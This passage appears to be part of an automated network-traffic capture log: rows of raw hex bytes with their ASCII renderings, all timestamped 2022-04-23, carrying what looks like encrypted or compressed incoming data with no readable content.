72 ee a3 d1 18 6a 10 f9 ed 34 1c ae b1 2b dd 7d 74 c8 18 62 94 f8 13 f7 a8 9c b3 58
                                                  Data Ascii: q(uZGB|Cu5;rnoyxt{Vl<F.:sQqe93*Ch`\!Qt4dGc+:~ARPT^c|1p8:a_^Y7`}pPK*.9~2~rj4+}tbX
                                                  2022-04-23 06:15:18 UTC1594INData Raw: a5 89 70 9c 7e e6 54 dc cc 50 a1 ff 97 37 33 9c c0 7f 17 d3 9d 56 0a 07 cf 0b f3 26 40 70 0c 47 19 f3 2e 65 6b 43 c3 14 b7 5a de 40 dc 0d 32 c1 7f 7d 5f b3 20 e1 c6 86 1e 6c fa 73 e1 6e 4d 46 8e 77 80 94 1c 1a 79 aa 05 9c ff e3 f1 4f e8 eb 37 2f 3b 85 5a ca 85 67 ef 61 13 f4 b0 24 da 4c 07 2b 19 8f 22 9b 97 35 3d df 99 a0 e4 a5 8e b7 51 06 36 a1 1a bb 6f 14 f0 e0 bd 0f bb cc 9d 19 e1 94 85 cf d1 75 46 79 61 99 5a 63 39 f9 00 d9 71 7c 9f 1f 38 fd 71 69 b0 24 95 76 9a e7 c7 0d 20 72 f0 99 5d e5 c3 c8 1f b0 b0 99 1c 75 d0 82 bd ce 9d ee 98 ed fe 6e 3d c5 9c a4 f9 e0 38 19 9f 7f ba 05 f8 4d f2 e6 ce 8d 64 19 da 92 af 94 4d a9 6d 3f e8 b4 5d 1f fa 74 4a 93 68 e7 e7 90 83 68 a9 14 32 d3 50 10 39 3c 2c 1d 7c 1f a3 aa 9b e8 40 5c 88 13 45 d4 1f d4 ad ea 6c 49 e9
                                                  Data Ascii: p~TP73V&@pG.ekCZ@2}_ lsnMFwyO7/;Zga$L+"5=Q6ouFyaZc9q|8qi$v r]un=8MdMm?]tJhh2P9<,|@\ElI
                                                  2022-04-23 06:15:18 UTC1598INData Raw: 08 92 6d c9 b2 42 2b c1 59 7d ad d8 97 9b 87 6d 11 b6 6e 19 7b b3 5e 5e b5 d3 98 66 9d 8e 1f 69 c7 21 8f bb 48 15 cb ed 5c 89 d6 d6 42 12 f3 fc 2b 7c 67 82 81 c4 8e 39 64 21 28 4a 75 84 80 a9 4b 86 eb a1 c5 8b 66 c4 83 0a 1e 66 3c fe 6b 80 5a a6 4d 97 8c a5 ca 3d 4e 8a 2b ad 86 dc d3 fa 35 b8 df cf b3 d7 8e 69 55 9b 80 75 56 71 a0 87 05 44 3c a8 2c f3 0b 37 c3 d3 41 6b e1 4f 95 67 5f 05 e0 cd 91 a6 63 1b 35 fc 67 c7 51 2b f3 c8 77 76 f0 bf 12 33 5e d6 23 4e 33 69 2b 9b 8b 09 cb 30 97 a6 c6 03 5b 75 8b 26 20 bd 50 43 b6 55 16 d8 9b c3 e7 01 47 70 0a 0a 3c 54 08 72 30 9b 8d 18 30 51 18 b3 e2 61 70 72 3a b6 99 3a b7 9b c9 8d 68 1e f9 cd 16 93 06 22 27 ab 9b 8f 13 f9 de b2 e6 0e fe 20 89 04 8e a8 96 e5 b1 dc 48 f3 db b3 3d f2 d0 ee 04 bc 40 c7 2b 63 38 21 bd
                                                  Data Ascii: mB+Y}mn{^^fi!H\B+|g9d!(JuKff<kZM=N+5iUuVqD<,7AkOg_c5gQ+wv3^#N3i+0[u& PCUGp<Tr00Qapr::h"' H=@+c8!
                                                  2022-04-23 06:15:18 UTC1602INData Raw: 0b b4 0b 64 c9 58 ae 7c 50 1c 1e ee 67 f6 98 1b bc e7 8a 40 ad aa 6c ea a0 f1 85 48 8b f5 0f c8 8d 3e 55 69 b0 74 92 44 2e 85 1d 2d 6f d9 58 90 f5 d9 36 c9 c4 c1 80 a8 10 f0 db cc ef 3a 99 a1 35 a2 e3 8d b0 bb b8 ca 4c 74 24 82 e8 6f 57 50 d6 01 a3 53 42 3a c1 a6 8f c6 3f b7 53 e7 76 39 77 fe 9d ea dd 44 c9 92 a5 03 9c 39 92 dd 62 fa c6 6e b0 9e 2a c4 d5 6a 39 dc 90 bc d6 b9 78 dd 32 27 79 9f 28 fc 75 f5 47 27 ec e5 9a e9 7a 14 d1 23 15 93 48 be 2f 37 d6 65 20 67 9e 03 59 72 86 e7 e5 c9 0d 3a be b0 d3 42 92 5d 34 b6 bd ff 5c a8 af 32 12 6e af 72 cc 5d 80 98 a2 65 2e 95 aa ae ff 2c 19 75 d5 49 33 dd 1b 7b 9c ec c9 fe 75 84 f4 fc 73 c9 58 91 4f 65 7b 12 48 a6 ef ae 3c f0 ec 07 08 85 57 5f 3f d8 2f a7 8d 88 9d 94 c9 84 5d 5a 0d 06 47 81 fd 3e 00 ff 44 ee e7
                                                  Data Ascii: dX|Pg@lH>UitD.-oX6:5Lt$oWPSB:?Sv9wD9bn*j9x2'y(uG'z#H/7e gYr:B]4\2nr]e.,uI3{usXOe{H<W_?/]ZG>D
                                                  2022-04-23 06:15:18 UTC1606INData Raw: ea fc f8 f5 d2 da 93 45 75 65 df 1e f9 e5 cb fe 77 7e 91 30 68 de c1 65 ac 15 ad a9 10 a7 a0 5d b2 ba f4 71 5b b7 9c b8 3b b3 05 0a 10 ab f3 07 af 66 79 e5 ec 88 2a 77 ed 41 8c 42 dd a7 56 ce 5a 00 ec 83 ff 62 92 95 9a 10 63 c4 22 52 a3 8e c3 45 ac aa 76 5e 19 e6 94 86 5a 82 77 8a 43 a9 86 cd 57 e0 ae 14 cc b1 53 b8 9d f1 f5 79 40 17 04 c5 7a b6 51 7e 62 6f 29 74 fb 60 e6 4d 83 1e 92 0b af 57 d0 47 73 ff 97 74 69 cb 5d 2f 0d 70 5b 75 53 74 4f 5d 03 a8 65 6e 17 d4 a1 e6 74 ca 0b 16 58 1f a2 a2 1b 4b 1f af a5 4d be 00 fb e5 ff c5 3b 28 4e 99 80 64 e8 1c 52 61 95 ef 36 f1 65 5b 60 c5 9a 5b 18 a4 92 c8 fe 81 23 e4 3d 68 90 6f a3 9e ee 96 24 b9 d5 64 98 17 30 5b f5 87 f1 8e d2 be ce 7e 6e ab f0 26 b8 5c 48 99 64 84 c3 c1 00 8f c0 f0 c0 bc d9 ba 12 09 fe 24 f8
                                                  Data Ascii: Euew~0he]q[;fy*wABVZbc"REv^ZwCWSy@zQ~bo)t`MWGsti]/p[uStO]entXKM;(NdRa6e[`[#=ho$d0[~n&\Hd$
                                                  2022-04-23 06:15:18 UTC1610INData Raw: ce 39 19 87 04 f7 6b 50 dd 31 69 29 d4 c2 eb e1 f0 91 20 07 ee e3 87 3e 96 6a c2 c8 a3 d4 18 26 80 56 5c 7c 18 ff 65 e3 bb 2b ba de 21 ef 28 d3 d6 f5 89 7b 87 f3 5c db 7f 75 df 51 1a 80 71 06 56 b3 13 93 56 aa 68 2a 55 0b 78 5e 21 70 e3 99 53 ab 7d 3d 53 8a da 1d d6 c2 06 33 69 91 18 9b 16 70 7e 06 73 b7 44 6c a1 5d 02 12 17 dc 3b e9 ef d5 23 06 67 5b 72 dc 7a 97 66 06 ec 59 f3 5c 1d e6 aa ca ee 60 14 d3 03 09 98 02 ee 72 75 0a 4e df 9c 19 c8 02 9c c4 f6 2c 6f 94 cc 8e fe bd 6e 20 86 22 a9 3b 3b 9b e7 76 c0 de 86 6c 51 a1 bd f3 3f f0 c4 76 44 dd 73 0a 1c 3d a1 e2 c5 04 4a db 92 5b cc e1 aa 39 05 9c 4e d4 3c e6 01 7c 54 da 42 e0 6b 69 e2 f8 84 af 3e 42 4d d1 a8 79 a9 db d4 72 cc 6d 39 2c ac 91 e4 6a dc 2c 19 01 ac ce 41 4c 24 5e 0a 89 8e 5b d4 9e fa dc f5
                                                  Data Ascii: 9kP1i) >j&V\|e+!({\uQqVVh*Ux^!pS}=S3ip~sDl];#g[rzfY\`ruN,on ";;vlQ?vDs=J[9N<|TBki>BMyrm9,j,AL$^[
                                                  2022-04-23 06:15:18 UTC1613INData Raw: b3 d9 cc bf 52 49 ff 69 4b 3d c0 4f 85 d1 ce 9c eb 6d 2e 28 59 c3 27 16 40 82 33 54 05 a9 a2 55 7b a1 d8 05 cf 3e 45 e4 13 f2 7e 1c 0e 29 59 f4 f5 75 68 ae 21 c6 7f 2c b4 a3 40 c7 8d 02 73 d9 22 29 fd a2 79 ef 70 e8 9b cc 63 a7 62 6d de b1 de ae 30 9e 01 d8 2b 23 7f 36 2a 66 ac de 90 a2 17 44 52 39 2b 3b 4d 80 b5 53 e8 be 03 ec 91 7f e4 4c 1c a8 11 bf 44 a7 ee 9d dd ee 13 a2 72 5d 22 d3 7c 87 16 f0 ce 6a e9 f0 1d 69 8b 79 d1 45 89 4b 75 23 2e 5b ed 31 d7 a1 53 f4 41 c7 56 6b f4 f4 ef 3b 91 71 a1 9c 00 b8 50 de 4a b1 b3 f7 8b 9f a1 72 00 28 7f c4 97 45 1f 7e fb 89 8d 2a b1 e8 57 21 43 d0 7d ea c2 31 77 7e ec fd 45 22 bd 40 e8 63 ce 27 34 fc 2f c9 75 dc 1b 5c 0a 75 90 90 cc e3 5e f1 ae bf 7d bf b4 40 b7 da 89 27 9b 92 48 b5 6f 7e 20 20 f0 26 6d ac 0b fd 5b
                                                  Data Ascii: RIiK=Om.(Y'@3TU{>E~)Yuh!,@s")ypcbm0+#6*fDR9+;MSLDr]"|jiyEKu#.[1SAVk;qPJr(E~*W!C}1w~E"@c'4/u\u^}@'Ho~ &m[
                                                  2022-04-23 06:15:18 UTC1617INData Raw: 25 4d 6c bf fd 30 d3 95 e9 e2 af 7c 47 a8 9b e9 5d 18 99 b3 d7 e1 7e de 2e b0 1d 35 e5 df a3 4f 89 9a 11 e1 2c 55 16 a3 1e e6 fc 1f 38 8c 16 d8 88 f7 19 67 2f 0a 2f 87 e6 52 67 64 d7 02 08 04 7c 98 9b 4f 57 4c 7a 49 be 49 e7 67 10 57 05 af 6a ce 5d 2b ac 9e f2 8a 94 dd 78 0b 73 9b a7 e8 15 41 22 07 9f c1 b8 d7 30 45 d4 77 89 70 c2 39 e6 08 3b 18 e1 27 e2 c9 d7 a3 c6 37 16 23 a9 47 14 04 2b 2d 4a 16 6f d5 d9 0e 01 6b fc bd a3 7c 6c 27 f3 8f c8 1a 30 71 2a fc 5a 24 d5 28 7d 48 09 f2 92 66 36 10 d0 88 05 06 c7 1c d6 df 41 21 9f bf 36 90 43 3d f3 4b bd 23 31 c6 f3 2f 76 39 43 eb 6b a1 25 37 bc c7 0c 8b ec ad f7 5a 7c bb 56 68 4d cc 39 af 35 32 fa 22 ad b0 ec c0 f3 80 23 44 e4 ff 77 07 84 00 2f 66 dc 76 d6 fe dc 45 18 32 09 7a 96 3d 2d 35 ea 57 89 5f f6 60 3a
                                                  Data Ascii: %Ml0|G]~.5O,U8g//Rgd|OWLzIIgWj]+xsA"0Ewp9;'7#G+-Jok|l'0q*Z$(}Hf6A!6C=K#1/v9Ck%7Z|VhM952"#Dw/fvE2z=-5W_`:
                                                  2022-04-23 06:15:18 UTC1622INData Raw: d3 dc 73 b7 0b d2 7d 50 04 f6 86 7f 29 b6 5f 9a 29 8d 7a e9 12 66 27 e6 8a c5 b1 fc e7 49 7b ab 5e 1f bc 87 72 4b a0 2c 65 b0 bb 53 96 b2 6f c6 9c 0e 43 64 fb 1b 4d f9 1a 43 ae b3 fa b4 48 f5 b7 74 e2 d8 7e f9 27 69 54 45 9c 1a 1c 82 9b 57 11 89 92 88 df 49 2e 1f 29 58 66 c9 58 97 0c 07 52 f1 fc e2 c1 78 80 58 6d 40 c3 76 c0 fd d1 74 31 74 09 b3 20 42 8f aa d8 be 9c a3 31 94 95 3b 89 55 8d ca 85 1b 7a 11 f8 b3 b5 01 53 e5 22 ba 84 f7 3c 35 d1 a1 dc ef ec 22 89 04 c0 75 36 4d 40 71 a1 f5 b8 c0 a8 d5 46 56 fd 1a c8 f6 c8 fa 40 5a b0 88 24 62 24 89 ff 98 96 29 33 a2 ef b1 88 0d 44 3d 81 4c dd de f3 ad be 42 21 d5 c8 63 bc 83 cd 27 76 a5 ec bb bb 81 3a 91 e1 60 cc 4a 24 e4 97 8b 5d d9 e3 7c 37 39 e7 7f a6 f7 21 f8 41 94 8c ec 15 e3 8a 57 3c 30 a6 63 05 83 01
                                                  Data Ascii: s}P)_)zf'I{^rK,eSoCdMCHt~'iTEWI.)XfXRxXm@vt1t B1;UzS"<5"u6M@qFV@Z$b$)3D=LB!c'v:`J$]|79!AW<0c
                                                  2022-04-23 06:15:18 UTC1626INData Raw: 1a 7d 52 70 4a 52 7e 31 46 ca 33 89 f9 eb 93 83 a7 1a 44 da db 6c 1c a8 4f 37 bd f5 ae 44 f0 01 63 75 75 b6 71 bb c2 70 ee 0d 16 77 57 81 b3 9b 68 a9 2f 96 83 fb b0 68 73 f7 c9 3f 01 1f a6 37 8b b2 b2 7c 41 d1 83 58 28 aa 02 ee fd 83 03 25 f0 7f c4 8b 84 81 34 b1 d8 83 6c 0b e3 d7 78 63 a2 a4 76 43 64 5d 16 eb 79 2b 1d 32 ed 57 86 56 23 aa 65 68 91 2f e8 7b 73 e7 53 75 65 52 09 0c ad e4 8b f3 e1 a9 3c be 2e e3 09 5d 5c d1 3b 3f c4 e8 32 ab b9 99 1f 49 58 c6 33 b4 de 72 88 b3 c5 28 ee 46 64 07 b5 f5 c2 b7 80 57 45 3a df 7c da a7 af 39 e0 e5 f7 ce 85 75 61 8a 85 b1 be f5 b1 6e 86 a6 4d c3 29 90 f1 a9 32 75 58 41 cf 20 61 79 83 55 0f 81 48 90 85 41 bd 64 21 25 92 6e 58 f9 52 02 1a 56 52 ef 8b 2d 93 85 5f ab 0f 92 29 fd de 79 65 74 ed b9 2b 0b ef 89 79 8b 74
                                                  Data Ascii: }RpJR~1F3DlO7DcuuqpwWh/hs?7|AX(%4lxcvCd]y+2WV#eh/{sSueR<.]\;?2IX3r(FdWE:|9uanM)2uXA ayUHAd!%nXRVR-_)yet+yt
                                                  2022-04-23 06:15:18 UTC1630INData Raw: 28 6d 6e af 1d 1b 19 6e f4 bd 2e 29 6e 7e cd 1b b5 cb 4c 89 da 09 85 3f f8 26 9d 99 0d 0c dd 1b 55 24 8e 6f d3 cf 5b d3 1b 5a 20 50 9e 4a b8 7a 7c a9 a4 2c dd 64 68 0b 1c ce e8 39 4c 81 41 ce 1f 0c 03 08 7a a8 e4 0d 2a 2d 16 73 34 c5 ce 67 f9 bc 5d 4f 67 61 ac 3c b5 b7 4d 72 0f 34 69 2a f0 b8 5c 9e b9 57 da c9 d7 9f ad b2 4b 91 d3 7f ba e2 7b b7 e1 de a7 0b c7 4a ab 89 0d 78 c9 97 46 1e 97 e8 3e fa 2a 86 0c 99 be db 7c 8e f6 92 5a 3e 4d 68 fe 1d 72 ad 00 be 3f 59 96 34 2e c2 6f 3d 9a 4a 7c bb 67 9a 39 9a df fb 85 18 70 b4 48 fe bc 34 3e dc b5 bc 91 54 75 f0 ba a2 2f e9 ce e2 97 8f 65 45 b5 f5 d7 ed 10 30 6d 3a aa ae d8 46 b7 63 65 f7 c5 76 b3 93 f3 aa 05 42 ff 06 f3 bf 8f d0 34 65 4b ab fc be 78 18 b9 9d e9 cd 98 d7 4a e9 fb 7f c3 4a f9 ae 79 33 48 48 be
                                                  Data Ascii: (mnn.)n~L?&U$o[Z PJz|,dh9LAz*-s4g]Oga<Mr4i*\WK{JxF>*|Z>Mhr?Y4.o=J|g9pH4>Tu/eE0m:FcevB4eKxJJy3HH
                                                  2022-04-23 06:15:18 UTC1634INData Raw: 4b 80 04 73 c1 c2 9a a3 da 6b 9c 7f d7 b4 46 40 f9 4e de f2 32 41 ab 2d af c8 5a 26 d6 b6 29 d6 0e 59 ed a4 11 43 b1 cf 84 e7 7c 9f 79 44 8e 1e b7 e3 db 80 3d 43 ee c8 d0 6b 34 e9 7f 7e b3 f0 35 9a dc 81 7c f1 56 d1 31 7e 6f 17 e8 d2 69 1b 8d 53 a5 5b 71 ea 2e bc 4b 03 5c 82 ec 8f 52 2f 98 43 c2 05 fc d4 95 90 81 34 b1 d2 9f db 20 d2 c8 1e f4 36 e4 05 86 31 a3 d8 9c bc df 73 85 6d d1 b4 24 24 ba 74 b6 07 95 e4 63 65 50 cc 03 7d 79 71 45 75 9c cc 8e bc d3 3b 64 c2 b9 1a 63 d2 5f fb e8 12 60 30 ad d8 96 a4 69 19 97 33 2e ab 29 c2 82 ad c7 d9 1e c7 d9 6b fb 4f 87 ee 60 a2 38 f6 92 ab 06 21 1d d7 21 87 75 ee 64 88 66 67 4a a0 f9 5f a9 76 72 bc 87 19 02 b7 a2 5e 51 e0 a9 bc 7f 25 a9 3b 5a 5a 97 51 28 58 f2 97 cb 14 ad fb 31 0f 61 12 14 cd cf fc 62 42 10 0f d8
                                                  Data Ascii: KskF@N2A-Z&)YC|yD=Ck4~5|V1~oiS[q.K\R/C4 61sm$$tceP}yqEu;dc_`0i3.)kO`8!!udfgJ_vr^Q%;ZZQ(X1abB
                                                  2022-04-23 06:15:18 UTC1638INData Raw: da 5a b1 15 f2 fd 5d 81 72 e3 fb 85 a7 f5 a9 c5 22 bd 8d 20 32 dc 59 3d b1 03 ec 16 cc 4c 23 64 ca f8 c1 73 d9 ec 08 7f 74 ca ab 17 07 e8 a9 51 bf 4c 98 85 6b d4 69 31 64 ed e9 8b a2 dc 6d 72 b6 46 71 0f e3 aa 8c f6 07 05 00 df e5 52 e5 04 30 7b b6 56 a7 d9 ce e6 eb 28 9a 44 19 a3 5d c6 17 02 75 78 41 6b f2 7e 32 9e 8b a7 ce 6b 07 1b 8d 28 de d2 3f 50 d9 fc d5 a9 cd 02 27 18 bf e7 5a ca 1a be d9 ca 05 ea 31 93 b9 55 9a f7 00 eb 2f 5f 93 4c eb 46 df 38 b0 37 df ae ae 26 70 6c d7 11 4f 5a 2b 75 5d 3b 0f be 8a a8 2a f9 36 bf 18 94 10 65 b1 d3 f1 99 24 92 fd ad 34 40 fa 73 53 99 45 cb 1a 8e 5c 6a 5a 71 0d fd 8b d4 5e 88 f7 e3 9c 77 64 ba d0 e2 63 3f c4 7a f7 12 ad 7c 2d a0 b8 b6 65 57 c2 a3 51 c8 95 b7 f6 26 c4 72 e0 5e d8 ac e8 8a 0d 53 b4 b3 f5 e1 51 fa af
                                                  Data Ascii: Z]r" 2Y=L#dstQLki1dmrFqR0{V(D]uxAk~2k(?P'Z1U/_LF87&plOZ+u];*6e$4@sSE\jZq^wdc?z|-eWQ&r^SQ
                                                  2022-04-23 06:15:18 UTC1642INData Raw: d2 62 3f 23 aa a0 da 5a e8 3d 7a 2d 13 22 4c 65 75 0f 9f 70 f8 10 32 4f 1e 95 dd bc 30 6c 61 c8 41 d7 f7 1e 73 7f b3 50 7b 10 b7 88 e6 90 fe 2a 64 0b 96 ff 79 72 1d e8 42 3e 8a 21 6a 1d e3 7d 38 54 32 53 e8 df 42 52 34 10 4b 26 4b 29 2a 90 92 4f 3d e6 1f bb 7b 94 7d df 3e 63 b5 33 f3 b6 bd 96 70 1d 46 31 5f 94 88 b5 9e b7 f7 d7 1f ae d6 83 df 33 7c 4e 11 51 4f f9 cc 37 85 5e 6c 64 40 8a 00 da fa 4d 5c c2 43 ad db 1f ab bb bc d2 23 95 4e 70 3c 80 77 2e 0d 27 38 dc 70 2f d3 8d e5 94 83 dd 26 91 40 bc 41 01 6f 45 5f d4 ea 16 6c bd 4b f0 30 5b e8 0b ac a2 c6 02 89 d9 7d e0 05 43 be 15 5b 28 22 5b d9 9a 40 d9 54 91 fc fa 17 3e e6 8e 26 fd bf 26 d0 d5 cf da b1 b8 8d c3 52 b3 d0 11 1e 0f 22 0b 3c 6e f8 d7 2f 5f 16 c5 1b 76 69 74 ac 44 72 95 80 ca 10 8e 57 dc 24
                                                  Data Ascii: b?#Z=z-"Leup2O0laAsP{*dyrB>!j}8T2SBR4K&K)*O={}>c3pF1_3|NQO7^ld@M\C#Np<w.'8p/&@AoE_lK0[}C[("[@T>&&R"<n/_vitDrW$
                                                  2022-04-23 06:15:18 UTC1645INData Raw: c6 07 ac fa 09 83 f6 93 ca 18 f1 5d 6a cd ee a9 ab 86 e8 1b 18 4b 48 2f 1d 07 29 db 04 22 3a 2e 61 e8 79 54 eb f5 4e b0 90 1b 1c bf 09 6c 2e da ae f9 eb 64 5e 18 21 ce 51 2b 34 3c 5a 83 51 56 75 0e ce e8 6a 7a 7b 09 34 80 7d 65 0a 0f 02 12 a4 c4 19 21 6e 95 d5 de 1e bc 2b 7b c4 f7 6e 64 79 76 ba 38 f1 93 72 85 78 1b 50 3f d4 36 e5 70 c6 6b 92 fd 75 42 9e 5d ee ef 23 13 f6 f8 52 06 42 d2 cb 45 8b 6c 67 a6 96 fc e8 61 91 05 c0 0f 34 c7 89 ae f5 45 bf 17 dd 6d 28 2a 1a a0 a6 26 ae 24 a1 a8 92 29 e0 cd b3 19 cc bc 0b c5 82 77 3c 42 0d c5 eb 2c 59 ee 71 7c a7 c1 87 d9 46 bb 20 24 aa b6 37 fb 43 52 67 c4 cc ee dc 7c 7d 36 cd 1e db f9 c6 1f 35 54 c6 a5 a8 c9 ad 6f 50 ac 29 44 10 93 e4 9a d8 bf 29 76 91 75 96 3b 2a f2 ee 99 8c 60 4c 7c 3a 81 7b 6f 36 e1 0b 20 55
                                                  Data Ascii: ]jKH/)":.ayTNl.d^!Q+4<ZQVujz{4}e!n+{ndyv8rxP?6pkuB]#RBElga4Em(*&$)w<B,Yq|F $7CRg|}65ToP)D)vu;*`L|:{o6 U
                                                  2022-04-23 06:15:18 UTC1649INData Raw: 6c 33 5c 4f 98 be ad 16 52 26 78 6f 53 5c 60 05 60 88 9a f4 4e 88 46 3f 54 8a fe 67 2b 90 fa 2e cc a2 51 f0 70 98 64 47 70 80 c1 48 36 db a1 71 6e 74 85 d2 58 fc 5d 5a 30 ac f9 1c 04 03 09 03 1e 1a 0c 92 f3 cc 9d 4b 0d 53 92 bb 13 e1 ac 76 b2 76 96 0b 4b d7 04 13 86 18 2a 88 70 b7 78 41 c0 14 d8 e5 17 02 d9 6f aa a5 aa d3 52 5d dc d0 24 28 0c d8 8a 22 a1 4b af a3 6f 4a 3b 02 9f 82 2e 89 43 8f db 38 cf f7 a9 4e f3 0a 5b cf 9b fc df 34 d9 68 fb 63 c5 73 88 b5 75 63 a8 cc fc 36 6f 96 98 a4 16 42 0f f2 c5 c1 65 2a 7d d5 de 42 8a ad a7 ec b0 43 39 d0 07 df b4 59 af c7 84 82 da 2c a8 8a 43 29 28 d6 49 d2 cf 49 82 27 a0 d6 e3 19 a9 c6 15 ea 53 e5 78 27 c1 05 83 af dc 33 33 8a c5 34 3e 1d 91 37 eb c8 7f c2 c0 82 1c 4e c6 07 25 c3 33 14 61 c2 d0 8f 1d 98 92 7b 3c
                                                  Data Ascii: l3\OR&xoS\``NF?Tg+.QpdGpH6qntX]Z0KSvvK*pxAoR]$("KoJ;.C8N[4hcsuc6oBe*}BC9Y,C)(II'Sx'334>7N%3a{<
                                                  2022-04-23 06:15:18 UTC1654INData Raw: b2 c5 55 33 ac af 1a 46 d3 79 c3 92 74 0d a8 d4 7e 4e 4c 50 63 c7 11 8f c1 d8 4d 16 1c 73 eb 79 99 a3 a9 72 81 e9 a3 7b 2e 76 77 69 b0 97 00 ca 27 23 82 38 ee d0 b5 4a cb 2f d6 3a 6b 72 02 3e 1f 0b 47 11 cd d3 a3 3a d6 d2 67 d7 f7 3c 95 63 4a d0 ce fe 8e e4 58 54 c5 a4 e7 fa fd 67 6d 35 86 56 1a e4 22 4c 1a 96 f8 f5 84 7d b7 e9 f9 43 e9 80 26 01 4f 8a 18 09 75 42 37 cf fb 0d db 6c a5 38 1c 4a 40 00 88 94 da 33 bf 0b d9 69 03 65 e8 16 9d ba a9 5f 24 29 a8 3c d9 5a 16 cc ca 9d a5 86 92 2e 4d ba ee f2 4d c6 55 ca aa 07 40 63 c3 2b f4 31 bc ab 79 38 00 76 b2 97 83 2c cb ab 05 db 71 14 37 6d fc 17 8a 6d fd 86 46 00 21 96 8c f6 4b 72 46 9c 50 06 10 00 fa 6a 0a c8 83 7c 38 e2 49 b3 79 a7 68 92 88 0a ea 4b cf 03 03 1a c1 91 e4 93 9c fc ca 72 5c a3 24 32 1b 93 6c
                                                  Data Ascii: U3Fyt~NLPcMsyr{.vwi'#8J/:kr>G:g<cJXTgm5V"L}C&OuB7l8J@3ie_$)<Z.MMU@c+1y8v,q7mmF!KrFPj|8IyhKr\$2l
                                                  2022-04-23 06:15:18 UTC1658INData Raw: 15 f8 97 f3 de 36 7c bb 26 a2 a7 3c 50 02 48 bb 4b ab d1 c7 9e 9a 9e 8b 38 f3 e0 c6 03 6f ef 86 32 45 74 a8 2f f7 82 fa c1 e8 22 31 35 ac 99 3b de 46 0c 63 15 12 54 d2 35 22 46 b0 3f ee a8 dc ff 5d 26 db 29 4f b4 90 4f 32 b5 51 6e 0c 91 85 b6 59 71 41 11 82 d2 8c 1c f8 64 7a a6 c6 28 56 a1 f8 9f 59 f0 11 96 47 29 dd fa db 87 89 ba b6 18 7c 54 b6 84 5d 1d 06 52 3b c5 70 81 68 46 b2 c8 96 88 63 b8 93 51 d0 e4 97 60 7a 8b c4 4e c0 84 ae 53 05 7e 68 07 ca a6 5b 2e 55 1c 68 8b 17 18 59 08 7c 86 c9 77 6e 73 8b df c5 5a 06 11 14 eb a3 60 c6 f9 ea 76 9c eb d0 c7 a1 e0 f3 ab 75 20 3f b2 5a e9 53 37 e8 03 b6 83 db 41 e4 67 d1 58 e3 30 bc 4a 4a ac f8 98 6e ab 23 5a 24 a6 18 40 e2 d2 ba f8 62 41 a6 02 40 66 31 5a 40 11 c1 e5 0d 3a b2 b8 64 3a 0d 1b 77 7a a3 6c f0 59
                                                  Data Ascii: 6|&<PHK8o2Et/"15;FcT5"F?]&)OO2QnYqAdz(VYG)|T]R;phFcQ`zNS~h[.UhY|wnsZ`vu ?ZS7AgX0JJn#Z$@bA@f1Z@:d:wzlY
                                                  2022-04-23 06:15:18 UTC1662INData Raw: 8d cf 57 60 bc d9 3e 8c ad 3b df 9e ad 56 54 73 e0 e7 52 55 24 e4 a7 9e 16 be aa 3a 98 73 da 07 e8 42 7c e1 dc 48 6d 4c 73 8b e0 58 e4 31 3d 46 2b f7 3e fc 07 13 bb 87 8f 52 2d b3 0c 02 42 7b f1 d7 47 4e 9a a7 c5 e3 a1 c4 6a 46 55 a5 35 87 bc cd 6a 9f 8d 61 bf 33 ec b8 b9 3b ba b2 04 2e ec 80 86 b3 be 3e 1a 8d f3 84 9e df 8c 91 8d 1c 13 c0 52 36 28 55 ee 95 31 4a 14 fa 05 fb 27 01 8c a1 9d 89 ad 14 70 6b da 87 ce ca b5 6a 39 b0 49 22 c7 ea fd 1e 06 4d d4 22 c7 6c 9b 68 09 04 2e 63 ac e6 81 bb e0 05 c8 fd 4d 8e 79 c4 13 66 e8 5b 77 99 ef db 7e cb 05 a9 2e a5 3a bc d6 aa 70 c0 d9 5a 51 b1 be ec 71 c8 a8 d2 7f 8a 9d e0 2e 78 ed ab 62 f0 86 e2 be 44 ad 1c 8c 66 33 c0 d3 68 dd 28 9a 17 2a 13 aa 2b b4 71 62 9b ee db 0b 76 87 2e 3f 93 4e 9e d1 01 c0 69 0c 7e 41
                                                  Data Ascii: W`>;VTsRU$:sB|HmLsX1=F+>R-B{GNjFU5ja3;.>R6(U1J'pkj9I"M"lh.cMyf[w~.:pZQq.xbDf3h(*+qbv.?Ni~A
                                                  2022-04-23 06:15:18 UTC1666INData Raw: 37 0d b1 c7 88 16 8f 51 38 f1 94 fb e7 47 f2 e7 cd a3 bc 25 6b 89 de 0f f9 ca 27 7d 0b 48 ac 52 8d 4f e0 05 ed 90 21 ff e6 16 87 d5 4c fb 9c 1e ca 54 91 84 14 e1 f2 4b 92 89 5f 36 85 1b 80 f3 34 b4 bc a3 ca 5e 36 05 58 b6 05 73 35 b6 be 0a 6d fb d7 4c 2e 9e 17 fa f6 ea 6d c3 0b e5 0a 17 15 96 10 85 b2 13 79 99 b9 0a 0f d6 28 04 d4 d7 33 f8 16 a2 ee 46 ca 16 74 8e b4 3a e6 2b 85 98 5f 17 95 ee 65 7e a0 f2 42 58 37 79 77 24 fe d4 25 d6 1b 38 59 a0 25 9c 1e ad 98 0e 3f 95 ac 8d 6d 08 99 59 40 f1 7a dd 8b c2 6b 94 fe 83 4f eb 02 8a f8 13 6c bb 8f f4 d8 9a 15 5d 99 cb ff d2 ce 6b 6d ea 47 bd 02 5b fa 8c 9b 43 37 4f cf ca 71 e7 bb 07 9f 9b 2d 5a 15 94 b4 b3 9c 6f fb 5e 3c 8e fb 36 cc 9c e7 35 76 0d 76 b7 e7 26 45 58 55 3c 65 e8 b2 31 d3 76 ea 75 4d 2e 90 05 ca
                                                  Data Ascii: 7Q8G%k'}HRO!LTK_64^6Xs5mL.my(3Ft:+_e~BX7yw$%8Y%?mY@zkOl]kmG[C7Oq-Zo^<65vv&EXU<e1vuM.
